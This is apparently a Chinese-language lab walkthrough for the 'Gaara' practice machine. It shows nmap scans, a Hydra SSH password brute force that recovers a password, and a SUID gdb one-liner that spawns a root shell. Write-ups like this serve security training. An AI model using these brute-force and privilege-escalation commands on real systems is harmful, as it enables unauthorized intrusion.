root at kali in ~/Gaara $ ip --color address 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0 valid_lft 1654sec preferred_lft 1654sec inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute valid_lft forever preferred_lft forever
1.1 地址探测
使用 Nmap 扫描出一个 IP:10.10.8.23
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
root at kali in ~/Gaara $ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST Nmap scan report for 10.10.8.1 Host is up (0.00011s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 10.10.8.2 Host is up (0.000099s latency). MAC Address: 00:50:56:EA:61:D3 (VMware) Nmap scan report for 10.10.8.23 Host is up (0.000063s latency). MAC Address: 00:0C:29:2B:59:D5 (VMware) Nmap scan report for 10.10.8.254 Host is up (0.000047s latency). MAC Address: 00:50:56:E5:23:AF (VMware) Nmap scan report for 10.10.8.17 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 0.32 seconds
1.2 端口扫描
扫描开放端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
root at kali in ~/Gaara $ nmap -p- -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_port.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:51 CST Nmap scan report for 10.10.8.23 Host is up (0.000033s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA) | 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA) |_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519) 80/tcp open http |_http-title: Gaara MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
root at kali in ~/Gaara $ nmap -p22,80 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.23 -oN nmap_server.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST Nmap scan report for 10.10.8.23 Host is up (0.00043s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA) | 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA) |_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Gaara |_http-server-header: Apache/2.4.38 (Debian) MAC Address: 00:0C:29:2B:59:D5 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.43 ms 10.10.8.23
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds
1.4 漏洞扫描
使用 Nmap 进行漏洞扫描:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
root at kali in ~/Gaara $ nmap --script=vuln -T4 --min-rate 10000 10.10.8.23 -oN nmap_vuln.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-20 10:52 CST Nmap scan report for 10.10.8.23 Host is up (0.000032s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.67 seconds
root at kali in ~/Gaara $ hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://10.10.8.23 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-20 11:22:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.8.23:22/ [STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active [22][ssh] host: 10.10.8.23 login: gaara password: iloveyou2 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-20 11:24:23
使用 Hydra 爆破出密码为:iloveyou2。
既然有了账号密码,使用 SSH 连接:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
root at kali in ~/Gaara $ ssh gaara@10.10.8.23 The authenticity of host '10.10.8.23 (10.10.8.23)' can't be established. ED25519 key fingerprint is SHA256:XpX1VX2RtX8OaktJHdq89ZkpLlYvr88cebZ0tPZMI0I. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.8.23' (ED25519) to the list of known hosts. gaara@10.10.8.23's password: Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Feb 3 00:14:55 2022 from 192.168.220.1 gaara@Gaara:~$ id uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)
gaara@Gaara:/usr/local/games$ sudo -l sudo: unable to resolve host Gaara: Name or service not known [sudo] password for gaara: Sorry, user gaara may not run sudo on Gaara.
发现一个 gdb 命令,Linux GDB(GNU Debugger)是一个强大的命令行调试工具,用于调试 C 和 C++ 程序。
在 GTFOBins 中看看有没有 SUID 提权的可能:
有!那就直接执行:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
gaara@Gaara:/usr/local/games$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit GNU gdb (Debian 8.2.1-2+b3) 8.2.1 Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help". Type "apropos word" to search for commands related to "word". ## id uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
